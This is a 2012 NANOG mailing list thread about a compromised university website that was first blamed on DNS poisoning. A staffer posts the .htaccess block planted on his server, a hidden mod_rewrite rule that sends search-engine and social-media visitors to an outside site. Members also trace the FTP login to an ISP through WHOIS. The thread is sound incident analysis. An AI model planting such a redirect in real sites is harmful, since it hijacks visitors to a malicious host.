No DNS poisoning at Google (in case of trouble, blame the DNS)

Tue Jul 3 18:27:41 UTC 2012

it actually appears that skywire has a suballocation for that block,
http://www.robtex.com/ip/208.88.11.111.html#whois

#
# The following results may also be obtained via:
# http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html>
/rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html>
?showDetails=true&showARIN=false&ext=netref2
#

American West Internet SKYWIRE-SG (NET-208-88-11-0-1)
208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html>
 - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1)
208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html>
 - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at:
https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html>
/whois_tou.html
#

On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black at csulb.edu>wrote:

> By the way, FTP access originated from: 208.88.11.111
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
> 208.88.11.255
>
> NetRange:       208.88.8.0 - 208.88.11.255
> CIDR:           208.88.8.0/22
> OriginAS:       AS40603
> NetName:        SKYWIRE-SG
> NetHandle:      NET-208-88-8-0-1
> Parent:         NET-208-0-0-0-0
> NetType:        Direct Allocation
> Comment:        http://www.skywireusa.com
> RegDate:        2008-03-04
> Updated:        2012-03-02
> Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1
>
> OrgName:        Sky Wire Communications
> OrgId:          DGSU
> Address:        946 W Sunset Blvd Ste L
> City:           St George
> StateProv:      UT
> PostalCode:     84770
> Country:        US
> RegDate:        2007-12-04
> Updated:        2009-11-04
> Ref:            http://whois.arin.net/rest/org/DGSU
>
>
> Who We Are
> Skywire Communications is the Leading High Speed Internet Provider in
> Southern Utah. Offering Service in St George, Washington, Santa Clara,
> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
> provide high speed internet access to 100 Percent of Southern Utah. We are
> located in St George, Utah.
>
>
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -----Original Message-----
> From: Matthew Black [mailto:Matthew.Black at csulb.edu]
> Sent: Wednesday, June 27, 2012 9:52 AM
> To: 'Jason Hellenthal'; Arturo Servin
> Cc: nanog at nanog.org
> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
> Ask and ye shall receive:
>
> # more .htaccess (backup copy)
>
> #c3284d#
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
>
> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
>
> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
>
> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
>
> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
>
> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
>
> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
>
> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
>
> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
>
> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
>
> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
>
> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
>
> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
> </IfModule>
> #/c3284d#
>
>           # # #
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -----Original Message-----
> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
> Sent: Wednesday, June 27, 2012 6:26 AM
> To: Arturo Servin
> Cc: nanog at nanog.org
> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
>
> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)
>
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> >
> > It was not DNS issue, but it was a clear case on how community-support
> helped.
> >
> > Some of us may even learn some new tricks. :)
> >
> > Regards,
> > as
> >
> > Sent from mobile device. Excuse brevity and typos.
> >
> >
> > On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
> >
> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <
> bortzmeyer at nic.fr>wrote:
> > >
> > > What made you think it can be a DNS cache poisoning (a very rare
> > >> event, despite what the media say) when there are many much more
> > >> realistic possibilities (<troll>specially for a Web site written in
> > >> PHP</troll>)?
> > >>
> > >> What was the evidence pointing to a DNS problem?
> > >>
> > >
> > > It seems likely that he made a mistake in his analysis of the evidence.
> > > Something that could happen to anyone when operating outside of a
> comfort
> > > zone or having a bad day. Go easy.
> > >
> > > -DR
> >
>
> --
>
>  - (2^(N-1))
>
>
>
>
>
>
>
>

-- 
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer